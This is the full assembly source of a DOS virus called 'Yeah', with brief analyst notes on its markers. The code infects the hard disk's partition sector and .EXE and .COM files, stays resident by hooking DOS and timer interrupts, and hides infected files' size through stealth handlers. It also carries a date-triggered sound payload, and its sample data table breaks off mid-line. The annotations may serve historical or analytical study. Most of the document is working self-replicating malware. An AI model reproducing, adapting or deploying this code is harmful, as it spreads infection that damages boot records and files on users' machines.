;------------------------------------------------------------------------------
;
; Virus Name:  Yeah
; Origin:      Holland
; Eff Length:  4,096 bytes
; Type Code:   PRhE - Parasitic Resident .EXE & partition table infector
;
;------------------------------------------------------------------------------
;
; This program is assembled with TASM V1.01 from Borland International
; (assembling with MASM V5.10 from Microsoft Inc. is also possible).
;
; TASM stealth;
; LINK stealth,,stealth;
;
;------------------------------------------------------------------------------
;
; Analyst notes (all taken from code visible in this listing):
;   - "Eff Length" above says 4,096 bytes, but VirusSize below is 10D0h
;     (4,304 decimal); every size adjustment in the listing uses VirusSize.
;   - Markers written into an infected file by UpdateHeader: MZ header
;     CheckSum = 0DEADh, HeaderSize = 0, ReloCount = 0, and the seconds
;     field of the file time forced to 1Fh ("62 seconds").  The Find/FindFCB
;     handlers key on that seconds value to hide the size increase.
;   - The boot-sector part lowers the BIOS base-memory word at 0:0413h by
;     (VirusSize+3FFh)/400h KB and the resident code replaces the INT 1Ch,
;     INT 21h and (temporarily) INT 08h vectors declared below.
;
;------------------------------------------------------------------------------
;
; Interrupt vectors
;
; Overlay of the real-mode interrupt vector table at segment 0.  Each vector
; is an offset word followed by a segment word.
;
;------------------------------------------------------------------------------

iseg            segment at 0
                org     8*4
Int8o           dw      0                       ; interrupt vector 08h, offset
Int8s           dw      0                       ; interrupt vector 08h, segment
                org     1ch*4
Int1Co          dw      0                       ; interrupt vector 1Ch, offset
Int1Cs          dw      0                       ; interrupt vector 1Ch, segment
                org     21h*4
Int21o          dw      0                       ; interrupt vector 21h, offset
Int21s          dw      0                       ; interrupt vector 21h, segment
iseg            ends

cseg            segment public 'code'
                assume  cs:cseg,ds:cseg,es:cseg

;------------------------------------------------------------------------------
;
; Header of EXE-file
;
; These words sit at offset 0 of cseg; ReadHeader/WriteHeader later in the
; listing transfer 1Eh bytes to and from this area.
;
;------------------------------------------------------------------------------

VirusSize       equ     10d0h                   ; size of virus in bytes
PrgSize         equ     72h                     ; size of prg after the virus

Signature       dw      0                       ; signature 'MZ'
PartPage        dw      0                       ; size of partial (last) page
PageCount       dw      0                       ; number of pages
ReloCount       dw      0                       ; number of relocation items
HeaderSize      dw      0                       ; size of header (added to a
                                                ; segment value by the loader
                                                ; code, i.e. in paragraphs)
MinMem          dw      0                       ; minimum memory needed
MaxMem          dw      0                       ; maximum memory needed
ExeSS           dw      0                       ; initial SS
ExeSP           dw      0                       ; initial SP
CheckSum        dw      0                       ; header checksum word; this
                                                ; listing stores and tests
                                                ; 0DEADh here as its
                                                ; already-infected marker
ExeIP dw 0 ; initial IP ExeCS dw 0 ; initial CS ReloOffset dw 0 ; offset of relocationtable OverlayNr dw 0 ; number of overlay ComSize dw -1 ; Size of com-file (-1 for exe) ;------------------------------------------------------------------------------ ; ; This procedure is called when starting from an exe-file ; ;------------------------------------------------------------------------------ Main: pushf ; save flags sub sp,4 ; reserve space far cs:ip push ax ; save other registers push ds push es sti ; enable interrupts cmp cs:ComSize,-1 ; com or exe-file je ExeFile ; -1 : exe-file ComFile: mov word ptr ds:[6],0fef0h ; set availeble memory to max mov bp,sp ; set cs:ip on stack for mov word ptr [bp+8],ds ; returning to the orginal mov word ptr [bp+6],100h ; program mov bp,ds ; bp : stacksegment mov ax,cs ; bx : begin of com-file add ax,(VirusSize/10h) mov bx,ax mov cx,0ff0h ; cx : size of data to move add ax,cx ; es : buffer for mover and mov es,ax ; infecting the bootsect. push cs ; ds : codesegment pop ds jmp short InfectBoot ; infect bootsector ExeFile: mov dx,cs ; Relocation add dx,(VirusSize/10h) mov ds,dx mov cx,ReloCount ; number of relocation items add dx,HeaderSize ; size of exe-header mov si,ReloOffset ; offset of 1st relocation item jcxz NoRelo NextRelo: lodsw ; offset mov di,ax lodsw ; segment add ax,dx mov es,ax mov ax,cs ; relocation factor add es:[di],ax loop NextRelo ; next relocation item NoRelo: mov bp,sp mov ax,cs ; set cs:ip on stack for add ax,ExeCS ; returning to the orginal mov [bp+8],ax ; program mov ax,ExeIP mov [bp+6],ax mov bp,cs ; bp : stacksegment add bp,ExeSS mov ax,PageCount ; calculate size of exe-file mov dx,PartPage ; in paragraphs add dx,-1 sbb ax,0 mov cl,4 shr dx,cl inc dx inc cl shl ax,cl add dx,ax add dx,MinMem ; dx : size of exe-file mov cx,dx ; cx : size of code and data sub cx,HeaderSize mov bx,cs ; bx : start of code and data mov ds,bx add bx,(VirusSize/10h) add bx,dx mov es,bx ; es : buffer for mover and sub bx,cx ; 
infecting the bootsect. InfectBoot: push bx ; save bx and cx push cx mov ax,201h ; read bootsector from disk xor bx,bx mov cx,1 mov dx,80h int 13h jc BootOk ; error ? mov si,offset BootSector ; compare with infected code xor di,di mov cx,1*BootSize cld repe cmpsb je BootOk ; equal ? mov di,1beh+8 ; check partitions, we don't mov cx,4 ; want to overwrite them NextPartition: cmp word ptr es:[di+2],0 ja SectOk cmp word ptr es:[di],(VirusSize+1ffh)/200h+1 ja SectOk cmp word ptr es:[di],0 ja BootOk SectOk: add di,10h loop NextPartition mov si,offset BootSector ; exchange code from bootsector xor di,di ; with viral code mov cx,1*BootSize cld call Swapsb push es ; write virus to disk pop ds push cs pop es mov ax,(VirusSize+1ffh)/200h+300h mov cx,2 int 13h push ds pop es push cs pop ds jc BootOk ; error ? mov ax,301h ; write bootsector to disk mov cx,1 int 13h BootOk: pop cx ; restore bx and cx pop bx mov dx,cs ; dx = destenation segment xor di,di push es ; push seg:ofs of mover push di push cx ; save cx mov cx,1*MoverSize mov si,offset Mover cld ; copy mover-procedure rep movsb pop cx ; restore cx cli ; disable interrupts retf ; jump to mover Mover: mov ax,cx ; save cx mov ds,bx ; ds:si = source mov es,dx ; es:di = destenation xor si,si xor di,di mov cx,8h ; copy one paragraph rep movsw inc bx inc dx mov cx,ax ; restore cx loop Mover ; next paragraph mov ss,bp ; ss = new stacksegment sti ; enable interrupts pop es ; restore registers pop ds pop ax iret ; jump to program MoverSize equ ($-Mover) ;------------------------------------------------------------------------------ ; ; Bootsector startup ; ;------------------------------------------------------------------------------ Bootsector: cli ; disable interrupts xor bx,bx ; setup stack and ds mov ds,bx mov ss,bx mov sp,7c00h sti ; enable interrupts mov ax,ds:[413h] ; get size of base memory sub ax,(VirusSize+3ffh)/400h; subtract virussize mov ds:[413h],ax ; store new memory size mov cl,6 ; calculate segment shl ax,cl mov 
es,ax ; load virus in reserved mem mov ax,(VirusSize+1ffh)/200h+200h mov cx,2 mov dx,80h int 13h mov bx,offset StartUp ; bx=offset startup push es ; jump to startup (es:bx) push bx retf BootSize equ ($-Bootsector) ; size of bootsector part StartUp: cli ; disable interrupts mov ax,offset Interrupt1C ; hack interrupt 1C xchg ax,ds:Int1Co mov cs:OldInt1Co,ax mov ax,cs xchg ax,ds:Int1Cs mov cs:OldInt1Cs,ax mov cs:OldInt21o,-1 mov cs:OldInt21s,-1 mov cs:Count,-1 sti ; enable interrupts push cs ; ds=cs pop es mov si,7c00h ; di=7c00h (Bootsector) mov di,offset BootSector ; si=BootSector mov cx,1*BootSize ; bytes to copy cld ; copy forward call Swapsb ; restore orginal boot mov ax,7c00h ; offset bootsector push ds ; jump to bootsector push ax retf Interrupt8: push ax ; save registers push si push ds push cs pop ds mov si,SampleOffset ; get offset of next bit dec byte ptr ds:SampleBit test byte ptr ds:SampleBit,7 jnz OfsOk inc si cmp si,offset SampleEnd ; end of sample ? jb OfsOk ; no, play bit mov al,34h ; reset int 8 frequency out 43h,al xor ax,ax out 40h,al out 40h,al mov ds,ax ; reset int 8 vector mov ax,cs:OldInt8o mov ds:Int8o,ax mov ax,cs:OldInt8s mov ds:Int8s,ax inc byte ptr cs:SampleFlag ; set sample ready flag jmp short ExitInt8 ; end of interrupt OfsOk: mov SampleOffset,si ; store offset rol byte ptr ds:[si],1 ; next bit mov ah,ds:[si] ; get bit value and ah,1 shl ah,1 in al,61h ; get value of io-port 61h and al,0fch ; reset last 2 bits or al,ah ; set bit 2 with sample value out 61h,al ; write to io-port 61h ExitInt8: mov al,20h ; end of interrupt signal out 20h,al pop ds ; restore registers pop si pop ax iret ; return to program Interrupt1C: push ds ; save registers push ax push bx xor ax,ax ; interrupts vectors mov ds,ax mov ax,ds:Int21o cmp cs:OldInt21o,ax jne Changed mov ax,ds:Int21s cmp cs:OldInt21s,ax je Equal Changed: mov ax,ds:Int21o mov cs:OldInt21o,ax mov ax,ds:Int21s mov cs:OldInt21s,ax mov cs:Count,182 jmp short NotReady Equal: dec cs:Count jnz 
NotReady mov ax,cs:OldInt1Co ; restore vector 1C mov ds:Int1Co,ax ; (This interrupt) mov ax,cs:OldInt1Cs mov ds:Int1Cs,ax mov ax,offset Interrupt21 ; Hack interrupt 21 xchg ax,ds:Int21o mov cs:OldInt21o,ax mov ax,cs xchg ax,ds:Int21s mov cs:OldInt21s,ax mov ax,8 mov bx,offset Handle NextHandle: mov word ptr cs:[bx],0 inc bx inc bx dec ax jnz NextHandle mov byte ptr cs:Active,-1 NotReady: pop bx pop ax ; restore registers pop ds jmp cs:OldInt1C ; do orginal int 1C Swapsb: mov al,es:[di] ; exchange two memory bytes xchg al,ds:[si] stosb inc si loop Swapsb ; next byte ret ; return ;------------------------------------------------------------------------------ ; ; Manipilated functions ; ;------------------------------------------------------------------------------ Functions db 11h ; 1 dw offset FindFCB db 12h ; 2 dw offset FindFCB db 30h ; 3 dw offset DosVersion db 3ch ; 4 dw offset Open db 3dh ; 5 dw offset Open db 3eh ; 6 dw offset Close db 42h ; 7 dw offset Seek db 45h ; 8 dw offset Duplicate db 46h ; 9 dw offset Redirect db 4eh ; 10 dw offset Find db 4fh ; 11 dw offset Find db 5bh ; 12 dw offset Open db 6ch ; 13 dw offset OpenCreate FunctionCount equ 13 ;------------------------------------------------------------------------------ ; ; The orginal interrupt 21h is redirected to this procedure ; ;------------------------------------------------------------------------------ DosVersion: push ax push cx push dx push ds push cs pop ds cmp cs:Active,0 je NotActive mov ah,2ah call DOS cmp ActiveYear,cx jb NotActive cmp ActiveDate,dx jb NotActive cli xor ax,ax mov ds,ax mov ax,offset Interrupt8 xchg ax,ds:Int8o mov cs:OldInt8o,ax mov ax,cs xchg ax,ds:Int8s mov cs:OldInt8s,ax mov al,34h out 43h,al mov al,80h out 40h,al mov al,0 out 40h,al push cs pop ds mov byte ptr SampleFlag,0 mov byte ptr SampleBit,0 mov word ptr SampleOffset,offset SampleData sti Delay: cmp byte ptr SampleFlag,0 je Delay mov byte ptr Active,0 NotActive: pop ds pop dx pop cx pop ax jmp Old21 FindFCB: 
call DOS ; call orginal interrupt cmp al,0 ; error ? jne Ret1 pushf ; save registers push ax push bx push es mov ah,2fh ; get DTA call DOS cmp byte ptr es:[bx],-1 ; extended fcb ? jne FCBOk add bx,8 ; yes, skip 8 bytes FCBOk: mov al,es:[bx+16h] ; get file-time (low byte) and al,1fh ; seconds cmp al,1fh ; 62 seconds ? jne FileOk ; no, file not infected sub word ptr es:[bx+1ch],VirusSize sbb word ptr es:[bx+1eh],0 ; adjust file-size jmp short Time Find: call DOS ; call orginal interrupt jc Ret1 ; error ? pushf ; save registers push ax push bx push es mov ah,2fh call DOS mov al,es:[bx+16h] ; get file-time (low byte) and al,1fh ; seconds cmp al,1fh ; 62 seconds ? jne FileOk ; no, file not infected sub word ptr es:[bx+1ah],VirusSize sbb word ptr es:[bx+1ch],0 ; change file-size Time: xor byte ptr es:[bx+16h],1fh; adjust file-time FileOk: pop es ; restore registers pop bx pop ax popf Ret1: retf 2 ; return Seek: or bx,bx ; bx=0 ? jz Old21 ; yes, do orginal interrupt push bx call FindHandle pop bx jc Old21 Stealth: or al,al ; seek from top of file ? jnz Relative ; no, don't change cx:dx add dx,VirusSize ; change cx:dx adc cx,0 Relative: call DOS ; Execute orginal int 21h jc Ret1 ; Error ? sub ax,VirusSize ; adjust dx:ax sbb dx,0 jmp short Ret1 ; return Close: or bx,bx ; bx=0 ? 
je Old21 ; yes, do orginal interrupt push ax push cx push dx push si push ds push cs ; ds=cs pop ds push bx call FindHandle mov si,bx pop bx jc NotStealth mov word ptr ds:[si],0 call UpdateHeader NotStealth: pop ds ; restore registers pop si pop dx pop cx pop ax Not2: jmp short Old21 ; continue with orginal int Interrupt21: push bx ; after an int 21h instruction push cx ; this procedure is started mov bx,offset Functions mov cx,FunctionCount NxtFn: cmp ah,cs:[bx] ; search function je FunctionTrap add bx,3 loop NxtFn pop cx ; function not found pop bx Old21: jmp cs:OldInt21 FunctionTrap: push bp ; function found, start viral mov bp,sp ; version of function mov bx,cs:[bx+1] xchg bx,[bp+4] mov cx,[bp+10] xchg cx,[bp+2] pop bp popf ret Duplicate: call DOS jc Error pushf push bx call FindHandle jc Ret3 mov bx,ax call StoreHandle Ret3: pop bx popf jmp Ret2 Redirect: call DOS jc Error pushf push bx push cx xchg bx,cx call FindHandle jc Ret4 mov cs:[bx],cx Ret4: pop cx pop bx popf jmp Ret2 OpenCreate: or al,al ; extended open/create function jne Old21 ; no, do orginal interrupt 21 push dx ; save dx mov dx,si ; check extension of filename call CheckName pop dx ; retore dx jc Old21 ; exe or com-file? jmp short ExtensionOk ; yes, infect file or use ; stealth Open: call CheckName ; exe or com-file ? jc Old21 ; no, do orginal int 21 ExtensionOk: call DOS ; do interrupt 21 jnc NoError ; error ? Error: jmp Ret2 ; yes, return and do nothing NoError: pushf ; save registers push ax push bx push cx push dx push ds push cs pop ds mov bx,ax ; bx = file handle mov ax,4400h ; get device information call DOS jc PopRet ; error ? test dx,80h ; character device jnz PopRet ; yes, return and do nothing call EndOfFile ; get file size or ax,dx ; 0 ? 
jnz FileExists ; no, file already existed FileCreated: call HandleFree jc PopRet mov ah,2ah call DOS add dh,3 cmp dh,12 jbe DateOk inc cx sub dh,12 DateOk: mov ActiveYear,cx mov ActiveDate,dx mov ah,40h ; write virus to file mov cx,VirusSize call Zero2 jc NoVir ; error ? yes, return xor ax,cx ; entire virus written ? jnz NoVir ; no, return call StoreHandle jmp short PopRet ; return FileExists: call TopOfFile ; go to top of file call HandleFree jc PopRet ; no, do nothing call ReadHeader ; read exe-header jc NoVir ; error ? xor ax,cx ; entire header read jne NoVir ; no, not infected cmp Signature,5a4dh ; signature = 'MZ' ? jne NoVir ; no, not infected cmp HeaderSize,ax ; headersize = 0 ? jne NoVir ; no, not infected cmp CheckSum,0DEADh ; checksum = DEAD hex jne NoVir ; no, not infected call StoreHandle mov dx,VirusSize ; seek to end of virus jmp short Infected NoVir: xor dx,dx Infected: xor cx,cx ; go to end of virus if file mov ax,4200h ; is infected call DOS PopRet: pop ds ; restore registers pop dx pop cx pop bx pop ax popf Ret2: retf 2 ; return ;------------------------------------------------------------------------------ EndOfFile: mov ax,4202h ; go to end of file jmp short Zero1 TopOfFile: mov ax,4200h ; go to top of file Zero1: xor cx,cx jmp short Zero2 WriteHeader: mov ah,40h ; write exe-header to file jmp short Hdr ReadHeader: mov ah,3fh ; read exe-header from file Hdr: mov cx,1eh Zero2: xor dx,dx DOS: pushf ; call orginal interrupt call cs:OldInt21 ret FindHandle: push ax push cx mov ax,bx mov bx,offset Handle mov cx,8 NotFound: cmp ax,cs:[bx] je Found inc bx inc bx loop NotFound stc Found: pop cx pop ax ret HandleFree: push bx xor bx,bx call FindHandle pop bx ret StoreHandle: push bx push bx xor bx,bx call FindHandle pop cs:[bx] pop bx ret CheckName: push ax ; check for .exe or .com push cx ; save registers push si push di xor ah,ah ; point found = 0 mov cx,100h ; max length filename = 100h mov si,dx ; si = start of filename cld NxtChr: lodsb ; get byte 
or al,al ; 0 ? je EndName ; yes, check extension cmp al,'\' ; \ ? je Slash ; yes, point found = 0 cmp al,'.' ; . ? je Point ; yes, point found = 1 loop NxtChr ; next character jmp short EndName ; check extension Slash: xor ah,ah ; point found = 0 jmp NxtChr ; next character Point: inc ah ; point found = 1 mov di,si ; di = start of extension jmp NxtChr ; next character EndName: cmp ah,1 ; point found = 0 jne NotExe ; yes, not an exe-file mov si,di ; si = start of extension lodsw ; first 2 characters and ax,0dfdfh ; uppercase mov cx,ax lodsb ; 3rd character and al,0dfh ; uppercase cmp cx,04f43h ; extension = .com ? jne NotCom cmp al,04dh je ChkRet NotCom: cmp cx,05845h ; extension = .exe ? jne NotExe cmp al,045h je ChkRet NotExe: stc ; set carry flag ChkRet: pop di ; restore registers pop si pop cx pop ax ret ; return UpdateHeader: mov ax,4200h ; position read/write pointer xor cx,cx ; at the end of the virus mov dx,VirusSize call DOS call ReadHeader ; read orginal exe-header cmp Signature,5a4dh je InfectExe InfectCom: mov Signature,5a4dh mov ReloOffset,01ch mov OverlayNr,0 mov ExeSS,(VirusSize-100h)/10h mov ExeSP,0fffeh call EndOfFile sub ax,VirusSize sbb dx,0 mov ComSize,ax mov cx,10h div cx sub dx,1 mov dx,0ff2h+20h sbb dx,ax mov MinMem,dx jmp WriteIt InfectExe: mov ComSize,-1 mov ax,(VirusSize/10h) add ax,HeaderSize add ExeSS,ax add MinMem,20h add MaxMem,20h jnc MaxOk WriteIt: mov MaxMem,0ffffh MaxOk: mov ReloCount,0 mov HeaderSize,0 mov CheckSum,0DEADh mov ExeCS,0 mov ExeIP,offset Main call EndOfFile mov cx,200h div cx mov PartPage,dx add dx,-1 adc ax,0 mov PageCount,ax call TopOfFile call WriteHeader ; write header at the top of jc InfErr ; the virus mov ax,5700h call DOS mov ax,5701h or cl,1fh call DOS InfErr: ret ;------------------------------------------------------------------------------ ; ; Data to generate the 123 yeah sound ; ;------------------------------------------------------------------------------ SampleData db 
07dh,075h,05fh,0ffh,0ffh,0ffh,0ffh,0a0h,03fh,007h,0f8h,03ch,007h,0e0h,07fh,003h db 0c0h,0f8h,00fh,0c0h,0f0h,07ch,00fh,0c0h,0f8h,0f0h,01fh,081h,0ffh,081h,0fch,00ch db 07eh,007h,0f0h,071h,0f0h,03fh,007h,00fh,083h,0f0h,071h,0f8h,03fh,007h,01fh,003h db 0e0h,0e3h,0e0h,07ch,000h,0fch,00fh,080h,03fh,003h,0e0h,01fh,0c0h,0fch,007h,0f0h db 03fh,003h,0f8h,00fh,0c0h,0feh,003h,0f0h,07fh,001h,0f8h,03fh,0c0h,07eh,007h,0fch db 03fh,001h,0f8h,01eh,01fh,002h,03eh,00fh,0c0h,03fh,007h,0f0h,01fh,007h,0fch,00fh db 082h,0ffh,00fh,086h,00fh,038h,03eh,004h,03ch,01fh,008h,03eh,01fh,008h,03eh,00fh db 000h,07ch,00fh,080h,07ch,007h,0e0h,078h,0e1h,0f0h,0f0h,0e1h,0f0h,0f0h,0f0h,0f1h db 0e1h,0f0h,0e1h,0e1h,0f0h,0e3h,0c3h,0f0h,0cfh,007h,0f0h,01eh,00fh,0f0h,03eh,01eh db 078h,03ch,01ch,078h,038h,03ch,078h,078h,07ch,070h,0f0h,078h,0e1h,0c0h,070h,0c3h db 058h,061h,08eh,078h,0e3h,01ch,071h,0c6h,03ch,0e3h,08eh,030h,0e7h,01ch,071h,0c6h db 038h,0e1h,08eh,038h,0e3h,09ch,071h,0c7h,01ch,0f1h,0c7h,018h,0e3h,007h,038h,0e7h db 00fh,000h,0efh,00fh,001h,0e6h,00fh,0c1h,0e3h,01eh,003h,0e3h,08eh,0e1h,0dfh,087h db 0e1h,0c3h,0c6h,070h,07fh,003h,0f0h,073h,0f0h,03eh,007h,0ech,007h,0e0h,078h,070h db 07eh,00fh,00fh,007h,0c2h,063h,0e0h,07eh,008h,0f8h,01fh,080h,03eh,003h,0f0h,01fh db 080h,0fch,007h,0f0h,03fh,001h,0f8h,00fh,0c0h,0feh,003h,0f0h,01fh,0c0h,0f8h,01fh db 0e0h,07ch,01fh,0f0h,03eh,00fh,080h,01fh,00fh,0f0h,01fh,007h,0d0h,00fh,007h,0c3h db 00fh,007h,082h,00fh,007h,0c0h,00fh,007h,0c3h,00fh,007h,080h,00fh,007h,00ah,01fh db 00fh,08eh,01eh,01eh,00eh,03ch,01eh,01ch,03ch,03ch,018h,078h,07ch,018h,0f0h,078h db 0f1h,0f0h,0f0h,0e1h,0e1h,0e0h,0c3h,0c3h,0e1h,0c7h,083h,0c3h,08fh,00fh,003h,01eh db 01eh,00eh,01ch,03eh,01ch,078h,078h,038h,0f0h,0f0h,031h,0e1h,0ech,063h,0c3h,0c8h db 0c7h,087h,0f1h,08fh,00ch,0e3h,01eh,01bh,0c7h,01ch,027h,08eh,038h,047h,01ch,079h db 08eh,038h,071h,01eh,038h,0f2h,01ch,070h,0d6h,038h,0f1h,0c0h,038h,0f1h,0e0h,078h db 001h,0e4h,07dh,0f0h,0e0h,018h,018h,0f6h,03ch,088h,070h,01fh,0ech,078h,006h,004h db 
03fh,087h,0f2h,01ch,083h,0fbh,01fh,0e1h,0f8h,007h,0f0h,0ffh,0c3h,0f8h,003h,0c0h db 0ffh,001h,0f8h,007h,080h,03fh,001h,0e0h,00ch,086h,07ch,063h,0c0h,01fh,060h,0fch db 023h,080h,038h,003h,0e0h,038h,0c0h,018h,0c7h,0f8h,0c7h,000h,000h,001h,0c7h,0b8h db 060h,008h,006h,01fh,0c7h,018h,002h,030h,00eh,03ch,01ch,000h,000h,001h,0f8h,01ch db 001h,087h,081h,0e1h,080h,0cch,006h,000h,0c6h,060h,000h,008h,007h,080h,000h,020h db 0e2h,000h,000h,020h,008h,008h,063h,0ech,004h,023h,024h,062h,08ch,0abh,052h,02dh db 0a8h,004h,09bh,034h,0a5h,0c6h,092h,0b4h,0a6h,099h,012h,0c1h,09dh,0a0h,02ch,0dbh db 034h,0cdh,0a8h,044h,098h,0f6h,024h,003h,07fh,0a0h,040h,01bh,0feh,000h,00bh,0ffh db 080h,001h,0ffh,0c0h,000h,0ffh,0f0h,000h,07fh,0f8h,000h,03fh,0f8h,000h,03fh,0f0h db 000h,03fh,0f8h,000h,03fh,0f0h,000h,07fh,0c0h,003h,0ffh,0c0h,003h,0ffh,000h,005h db 0feh,04eh,01dh,0e0h,031h,0ffh,000h,0c7h,0feh,000h,01fh,0feh,000h,03fh,0feh,000h db 03fh,0ffh,080h,03fh,0ffh,000h,047h,0f9h,082h,007h,0e7h,08ch,00fh,09fh,070h,03eh db 07fh,0c0h,071h,0bfh,000h,0e7h,07ch,003h,09fh,0f8h,00eh,03fh,0e0h,018h,0f7h,0c0h db 073h,0ffh,001h,0c7h,0fch,003h,00eh,0f8h,00eh,03fh,0e0h,018h,06fh,0c0h,070h,09fh db 080h,0e3h,07eh,003h,0c6h,0fch,007h,083h,0f8h,00eh,007h,0f0h,01ch,06fh,0c0h,078h db 01fh,0c0h,0f1h,07fh,001h,0e0h,0ffh,003h,0c1h,0feh,003h,083h,0fch,007h,007h,0f8h db 00fh,00fh,078h,00eh,00eh,0f8h,01eh,01eh,0f0h,01eh,03ch,0f0h,01ch,03dh,0e1h,05ch db 039h,0e1h,018h,07bh,0c2h,038h,073h,0c3h,038h,0f3h,086h,038h,0e7h,086h,070h,0e3h db 086h,070h,0e3h,084h,070h,0e3h,086h,070h,0e7h,08ch,070h,0e7h,08eh,070h,0e3h,086h db 071h,0c3h,086h,078h,0e3h,080h,079h,0e3h,082h,038h,0f1h,0c3h,01ch,0f9h,0c3h,01ch db 078h,0c1h,01eh,078h,0e1h,08fh,03ch,070h,08fh,03ch,030h,067h,08eh,038h,073h,086h db 018h,07bh,087h,08eh,03ch,0e3h,08fh,038h,060h,0e7h,08ch,038h,0f3h,087h,00eh,078h db 0c3h,01eh,070h,070h,0e7h,086h,021h,0e7h,007h,08ch,078h,00eh,03eh,0e0h,0f1h,0cfh db 000h,0f1h,0e7h,007h,01ch,078h,0c7h,01eh,078h,070h,0c7h,08eh,030h,067h,0c7h,08eh db 
018h,0f3h,007h,070h,07ch,079h,0c1h,019h,033h,004h,0e3h,0cfh,003h,087h,03ch,070h db 0f1h,0c7h,00eh,03ch,0f1h,0e1h,087h,09ch,038h,061h,0e7h,08fh,01ch,03fh,087h,03ch db 00fh,0f3h,0c3h,086h,03ch,0f0h,018h,05fh,03eh,030h,0f1h,087h,0c6h,00fh,0f0h,0e3h db 0c7h,01fh,00eh,03ch,071h,087h,08eh,01fh,018h,079h,0c3h,08fh,01ch,01eh,018h,0f1h db 0e0h,007h,0cch,01eh,038h,071h,0e0h,0c7h,0c6h,01ch,07ch,0e0h,01ch,078h,07fh,010h db 07fh,0e0h,018h,0e1h,0cfh,018h,0e1h,0c0h,038h,0e7h,0c0h,01ch,079h,087h,038h,023h db 0ech,018h,0f1h,082h,078h,003h,0c6h,018h,07bh,0c1h,0f8h,001h,0cfh,018h,079h,0c1h db 00eh,038h,073h,0ddh,019h,0f1h,007h,03ch,070h,0e7h,008h,078h,0c3h,00eh,078h,023h db 08eh,018h,073h,0c7h,09eh,030h,0c3h,08eh,018h,0f1h,0c7h,00ch,070h,0e3h,08eh,03ch db 071h,0c3h,01ch,038h,0e1h,08fh,01ch,070h,0c7h,08eh,038h,061h,0c7h,01eh,038h,0e1h db 08fh,01ch,071h,0e7h,08ch,038h,0e3h,0c6h,01ch,078h,0e1h,00eh,01ch,078h,0c7h,08eh db 03ch,031h,0c3h,08fh,028h,070h,0e3h,086h,01ch,038h,0f1h,087h,00eh,038h,071h,0c3h db 08fh,01ch,078h,0e1h,0c3h,00eh,01ch,078h,0e1h,0c3h,08eh,01ch,078h,071h,0c1h,08fh db 08fh,0f8h,03dh,0f8h,018h,007h,0feh,002h,007h,0feh,006h,003h,0ffh,083h,0c1h,0ffh db 0c1h,081h,0f7h,0d1h,0c0h,0ffh,0c0h,0c1h,0f3h,0e1h,0c1h,0f7h,0e0h,0c1h,0e3h,0e1h db 0c1h,0e3h,0c1h,0c1h,0e3h,0c3h,083h,0c7h,083h,083h,0c7h,087h,007h,08fh,086h,00fh db 09eh,01ch,01eh,01ch,03ch,01ch,03ch,038h,078h,038h,0f0h,0f8h,0e0h,0f1h,0f1h,0c1h db 0e1h,0f3h,083h,087h,0deh,006h,00fh,03eh,01ch,03ch,07ch,038h,07ch,0f8h,060h,0ffh db 0c7h,083h,087h,087h,083h,00fh,00fh,087h,01fh,01fh,007h,09fh,01eh,007h,087h,00fh db 00fh,00fh,00fh,00eh,01eh,01eh,01ch,01eh,03eh,00ch,03ch,03eh,00ch,03ch,03eh,01ch db 01ch,07ch,03ch,038h,0f8h,078h,0f0h,0f0h,0f0h,0f1h,0f1h,0c1h,0f1h,0e3h,083h,0e1h db 0c0h,047h,0c7h,0c1h,08fh,00fh,086h,01eh,00fh,018h,078h,01ch,061h,0fch,071h,08eh db 071h,0c6h,031h,0c7h,030h,0c7h,018h,0e3h,08ch,0e3h,09eh,023h,08eh,078h,00eh,039h db 0c0h,078h,07fh,0e1h,0e0h,0f9h,0c3h,080h,0f3h,00fh,003h,0cch,03ch,0cfh,010h,073h db 
01eh,0e0h,0c6h,07dh,007h,001h,0fch,004h,041h,0f3h,080h,0b1h,0eeh,040h,067h,01ch db 039h,09eh,03ch,0e6h,038h,003h,09ch,063h,00eh,079h,087h,00dh,0c7h,00ch,007h,08eh db 018h,00fh,09eh,006h,01fh,01fh,00ch,03eh,03eh,006h,03ch,01ch,01ch,07eh,03ch,038h db 03eh,038h,07ch,07ch,060h,070h,079h,081h,0e0h,0e2h,063h,0c1h,0c1h,0c3h,087h,0c7h db 087h,007h,03fh,00eh,00ch,0ceh,03eh,033h,038h,078h,07ch,0e0h,0e0h,0f9h,0e3h,083h db 0f1h,085h,0cfh,0e6h,007h,01fh,098h,01ch,07eh,020h,070h,0fch,031h,099h,0d8h,0c6h db 067h,063h,01bh,09dh,08ch,00eh,07bh,030h,079h,0e0h,080h,0fbh,0cch,003h,0e7h,030h db 00fh,09ch,0c0h,03eh,033h,000h,0fch,0ceh,003h,0f3h,098h,00dh,0ceh,060h,037h,039h db 080h,0dch,0e7h,001h,073h,09ch,007h,0ceh,070h,01fh,01ch,0c0h,03eh,073h,000h,0f1h db 0cch,001h,0cfh,038h,006h,03eh,0e0h,00ch,0ffh,098h,043h,0feh,061h,00fh,0f9h,084h db 077h,0f2h,010h,08fh,0cch,003h,03fh,091h,000h,07fh,002h,013h,0fch,0c8h,047h,0fbh db 030h,00ch,0e6h,00ch,00dh,0dch,020h,099h,0b8h,0cch,013h,0e3h,038h,08dh,08ch,0e1h db 099h,03bh,0d8h,099h,0bfh,0ech,0c4h,07fh,09ch,0c8h,0ceh,07eh,004h,02fh,0f9h,000h db 027h,0f7h,020h,01bh,0ffh,0c0h,00eh,0f7h,060h,011h,0ffh,0c0h,006h,0ffh,080h,001h db 0feh,0c4h,066h,0fch,0d0h,011h,0ddh,0c4h,067h,027h,033h,0fch,0cch,046h,066h,072h db 000h,0cfh,0eeh,0c0h,00fh,077h,030h,019h,09fh,0e0h,000h,0dfh,0d8h,011h,01ch,0cch db 0cch,046h,067h,073h,011h,099h,09ch,0cch,0e6h,062h,033h,03bh,011h,08dh,0feh,0c4h db 003h,07fh,0b9h,080h,08ch,0f6h,062h,000h,03dh,0dch,000h,007h,0fbh,010h,019h,0bfh db 0e2h,046h,007h,033h,0b1h,008h,06eh,063h,031h,09fh,0f0h,000h,067h,073h,011h,099h db 0cfh,033h,030h,030h,0d9h,098h,080h,03fh,0fch,000h,04fh,0efh,073h,030h,018h,07fh db 0fch,000h,019h,0feh,000h,037h,0ffh,080h,000h,037h,08eh,0f9h,000h,003h,0ffh,080h db 006h,0ffh,0f0h,000h,01eh,0f1h,0dbh,080h,000h,037h,0f0h,000h,027h,0f3h,040h,04eh db 0e7h,000h,04fh,0c6h,000h,0dfh,0ceh,080h,09dh,0cch,001h,09fh,0c4h,000h,09fh,0fch db 001h,09fh,080h,000h,0bfh,0c8h,080h,09dh,0cch,080h,0ceh,0e4h,040h,04eh,0ffh,022h db 
